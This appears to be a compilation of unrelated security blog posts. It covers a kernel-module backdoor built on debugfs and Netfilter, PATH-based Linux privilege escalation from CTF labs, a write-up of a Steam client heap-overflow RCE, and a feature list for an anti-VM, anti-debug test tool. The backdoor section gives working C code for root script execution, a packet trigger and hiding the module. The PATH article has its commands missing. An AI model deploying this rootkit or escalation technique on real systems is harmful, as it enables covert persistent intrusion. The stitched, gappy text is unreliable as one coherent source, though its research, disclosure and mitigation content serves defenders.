Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Linux Privilege Escalation Using PATH Variable

Картинки по запросу got root

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “various method to manipulate $PATH variable” to gain root access of a remote host machine and the techniques used by CTF challenges to generate $PATH vulnerability that lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

Lets Start!!

Introduction

PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories where executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.

It is very simple to view Path of revelent user with help of echo command.

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

If you notice ‘.’ in environment PATH variable it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admin do not specify the full path to the program.

Method 1

Ubuntu LAB SET_UP

Currently, we are in /home/raj directory where we will create a new directory with the name as /script. Now inside script directory, we will write a small c program to call a function of system binaries.

As you can observe in our demo.c file we are calling ps command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

Penetrating victim’s VM Machine

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.

Hence with help of above command, an attacker can enumerate any executable file, here we can also observe /home/raj/script/shell having suid permissions.

Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like the file shell is trying to run ps and this is a genuine file inside /bin for Process status.

Echo Command

Copy Command

Symlink command

NOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.

Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.

Method 2

Ubuntu LAB SET_UP

Repeat same steps as above for configuring your own lab and now inside script directory, we will write a small c program to call a function of system binaries.

As you can observe in our demo.c file we are calling id command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

Penetrating victim’s VM Machine

Again, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command. Here we can also observe /home/raj/script/shell2 having suid permissions.

Then we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bins.

Echo command

Method 3

Ubuntu LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read the content from inside etc/passwd file.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

Penetrating victim’s VM Machine

Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

Here we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.

Nano Editor

Now type /bin/bash when terminal get open and save it.

Method 4

Ubuntu LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

Penetrating victim’s VM Machine

Once again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

Here we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.

Vi Editor

Now type /bin/bash when terminal gets open and save it.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels

Introduction

al-khaser is a PoC «malware» application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.

Logo

Download

You can download the latest release here.

Possible uses

  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.

Features

Anti-debugging attacks

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs
  • Memory write watching

Anti-Dumping

  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]

  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba — Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemManufacturer) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemProductName) (VMWARE)
  • Registry Keys artifacts
    • HARDWARE\ACPI\DSDT\VBOX__ (VBOX)
    • HARDWARE\ACPI\FADT\VBOX__ (VBOX)
    • HARDWARE\ACPI\RSDT\VBOX__ (VBOX)
    • SOFTWARE\Oracle\VirtualBox Guest Additions (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxGuest (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxMouse (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxService (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxSF (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxVideo (VBOX)
    • SOFTWARE\VMware, Inc.\VMware Tools (VMWARE)
    • SOFTWARE\Wine (WINE)
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters (HYPER-V)
  • File system artifacts
    • «system32\drivers\VBoxMouse.sys»
    • «system32\drivers\VBoxGuest.sys»
    • «system32\drivers\VBoxSF.sys»
    • «system32\drivers\VBoxVideo.sys»
    • «system32\vboxdisp.dll»
    • «system32\vboxhook.dll»
    • «system32\vboxmrxnp.dll»
    • «system32\vboxogl.dll»
    • «system32\vboxoglarrayspu.dll»
    • «system32\vboxoglcrutil.dll»
    • «system32\vboxoglerrorspu.dll»
    • «system32\vboxoglfeedbackspu.dll»
    • «system32\vboxoglpackspu.dll»
    • «system32\vboxoglpassthroughspu.dll»
    • «system32\vboxservice.exe»
    • «system32\vboxtray.exe»
    • «system32\VBoxControl.exe»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vm3dmp.sys»
    • «system32\drivers\vmci.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vmmemctl.sys»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmrawdsk.sys»
    • «system32\drivers\vmusbmouse.sys»
  • Directories artifacts
    • «%PROGRAMFILES%\oracle\virtualbox guest additions\»
    • «%PROGRAMFILES%\VMWare\»
  • Memory artifacts
    • Interupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • «\x08\x00\x27» (VBOX)
    • «\x00\x05\x69» (VMWARE)
    • «\x00\x0C\x29» (VMWARE)
    • «\x00\x1C\x14» (VMWARE)
    • «\x00\x50\x56» (VMWARE)
    • «\x00\x1C\x42» (Parallels)
    • «\x00\x16\x3E» (Xen)
  • Virtual devices
    • «\\.\VBoxMiniRdrDN»
